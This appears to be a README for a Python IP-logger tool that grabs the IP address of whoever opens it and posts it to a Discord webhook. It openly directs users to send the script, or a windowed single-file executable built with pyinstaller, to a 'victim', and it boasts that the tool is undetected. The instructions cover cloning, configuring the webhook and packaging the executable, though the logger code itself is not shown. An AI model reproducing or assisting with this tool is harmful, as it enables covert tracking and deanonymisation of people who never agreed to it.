A simple IP Address Logger for Discord Webhook written in Python. 📡
- ✅ Customizable Webhook address and name
- ✅ Shows IP details directly in the webhook
- ✅ Completly undetected
- ✅ Simple to use
- ⌚ I`m releasing .EXE builder very soon (I have some problems)
- After you open the file it will grab your IP Address and send it to a Discord Webhook
- You can send the Python script to the victim or convert it to the .EXE file with
pyinstaller
Tutorial below
-
Create a Discord Webhook on your server and copy the address
-
Download the script
git clone https://github.com/asisamko/IP-Logger-Webhook.git
or Code > Download ZIP
- Install dependencies
pip install -r requirements.txt
-
Edit the webhook address and name in the
logger.py
-
Run the code (CMD / Terminal)
python logger.py
- Install
pyinstaller
with pip
pip install pyinstaller
- Build the executable file
pyinstaller --noconfirm --onefile --windowed --name "exe-file-name" "this-python-script-path"
- You should get an executable file that you can send to the victim